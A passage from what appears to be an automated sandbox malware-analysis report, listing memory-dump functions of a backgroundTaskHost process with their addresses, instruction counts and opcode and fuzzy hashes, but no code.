                                                                                                              • Instruction ID: d80a4493df2188df8318f17a04afe3c8763d32d1667896b8809d65ff243409e3
                                                                                                              • Opcode Fuzzy Hash: 4783662381dcd71a9815db07534482895ac7faa8ac6bb84c38932820ab62e8cc
                                                                                                              • Instruction Fuzzy Hash: 3E11A031B0D78D8FE712DFA498542DD7FB0EB42214F0646F7C044DB2A2D9381605CB94
                                                                                                              Function 00007FFD9B7F0C48 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 287215f2bd3018f5fca83fc8d5538de90e6734b8fb9016239b4ca10f9b0634ee
                                                                                                              • Instruction ID: 777c36da65e47afd62290f5fb28510345290233bb866a3e61cb8abf356e088ed
                                                                                                              • Opcode Fuzzy Hash: 287215f2bd3018f5fca83fc8d5538de90e6734b8fb9016239b4ca10f9b0634ee
                                                                                                              • Instruction Fuzzy Hash: 14019E31A0D3888FD702DFA4C8546DD7FB0EF02214F1642EBC044DB2A2D6386A44CB91
                                                                                                              Function 00007FFD9B7F19F9 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction ID: 1c677b6c084e6ee833412e9a0cee33c9d5420401252d02120334e28be5550b41
                                                                                                              • Opcode Fuzzy Hash: e49ac10e7f4e2ed11dc9fc9324b79853f4bb7ec216eec6755fa3f80e90954fac
                                                                                                              • Instruction Fuzzy Hash: 72F03130B4961F8BEB74EA54CC60BF83661EF50310F0202B5C40DD36B1DE786A818B84
                                                                                                              Function 00007FFD9B7F0C50 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6529e3a9514a78e7eaa99a9d2aa3612362b048183454ac7ef3d39cdc94b7d26e
                                                                                                              • Instruction ID: 02e184925d010791b46769cdc981dcc46148ee9ec40a33f5ccfa6b001f5e06a3
                                                                                                              • Opcode Fuzzy Hash: 6529e3a9514a78e7eaa99a9d2aa3612362b048183454ac7ef3d39cdc94b7d26e
                                                                                                              • Instruction Fuzzy Hash: 60018F30A0D3898FD711DFA488546DD7FB0EF02304F1542E7C444DB2A6D9385A44C781
                                                                                                              Function 00007FFD9B7F43C6 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction ID: 78426b1bc250ca4da7f8108c065b10aa5cb33d68fec328faccb918beeace66a0
                                                                                                              • Opcode Fuzzy Hash: 5d9321e5b0ce7b80bcc98df1fb9cdba77fac917103449e8ec2efa1fa7c61ec28
                                                                                                              • Instruction Fuzzy Hash: 95E01220F0A51E47FBB49684CC60BA97664EB54310F1542B8D51FA33E1DD38AF459789
                                                                                                              Function 00007FFD9B7F0B95 Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction ID: b0e75633ef85d4c039f59fceb8aba3acc69af3247c43fd31e95459d426b5db10
                                                                                                              • Opcode Fuzzy Hash: 84da47e8a84d7c7bda6fe4433242c964a2a7c5542f6b8e5b554b8c59c440ec5d
                                                                                                              • Instruction Fuzzy Hash: 78D0A930229A4F8FCA00B778C88A824BFA0FB4F210BCA10E1E008C75B6C61888998740
                                                                                                              Function 00007FFD9B7F06AD Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction ID: 7de26762e6a141930322089d7dc473d07b8ea8d06e1fc822eaa47d40b2c9af3b
                                                                                                              • Opcode Fuzzy Hash: 35a49160e60ee853f605c8054370c066b52b2d658542092c8daf0daae25e67b6
                                                                                                              • Instruction Fuzzy Hash: 97C00205F5B75F01E46575EA54660ADB9409BC4A25FD21272D50D402B1A84E269901DE
                                                                                                              Function 00007FFD9B7F34ED Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 878d0a290a78d2d185027f1d5c4b1043abd59ccac3c4bd9f31a7ef4262b4e540
                                                                                                              • Instruction ID: 111686620137509a7379213602ecf810e687f1b913866b8007c6b5b0fbe9e8e2
                                                                                                              • Opcode Fuzzy Hash: 878d0a290a78d2d185027f1d5c4b1043abd59ccac3c4bd9f31a7ef4262b4e540
                                                                                                              • Instruction Fuzzy Hash: 85D0C714F0DA5D45F31BE354247477E69126F40258F8505F5D42D565E9CE4C270613D6
                                                                                                              Function 00007FFD9B7F0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction ID: c724e0e8e72e16ace30b6a403c41093a20e9779742b5bfbf346b1253903ce476
                                                                                                              • Opcode Fuzzy Hash: a26e15ad939bada4a4d8286c6715bb4a25744d60ea54c1746d662c91e97a4272
                                                                                                              • Instruction Fuzzy Hash: E5C08C306118088FC900E72CC88480436A0FB0D310BC20190E00DCB170E21AACC1C741
                                                                                                              Function 00007FFD9B7F34C7 Relevance: .0, Instructions: 10COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ba664a07dd54359d70fca37f0abd62606f653d5aee111a8cb4b6508814b03422
                                                                                                              • Instruction ID: fb155e6e12141ce06caa6864309f862431da8461515b055142bdfd0e1636c5fe
                                                                                                              • Opcode Fuzzy Hash: ba664a07dd54359d70fca37f0abd62606f653d5aee111a8cb4b6508814b03422
                                                                                                              • Instruction Fuzzy Hash: 54C08C00F18C5A02F319A24424307BF48025F8020CFC104F0E02E867DECC4C5B0222CB
                                                                                                              Function 00007FFD9B7F06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000037.00000002.2478867385.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_55_2_7ffd9b7f0000_backgroundTaskHost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction ID: 6881305654c7cbab0a925c6387becd6f9990f21ef2f35e0a2133cb5c006623c9
                                                                                                              • Opcode Fuzzy Hash: 3ab5ce359cc7f79df66d9968f92a2c5830e2d9ffe99e67b19e8a7f70b6af0767
                                                                                                              • Instruction Fuzzy Hash: 62B01200F9750F00E42471FA08A30747C80DF44100FC20270D40C402B1A84D169802CB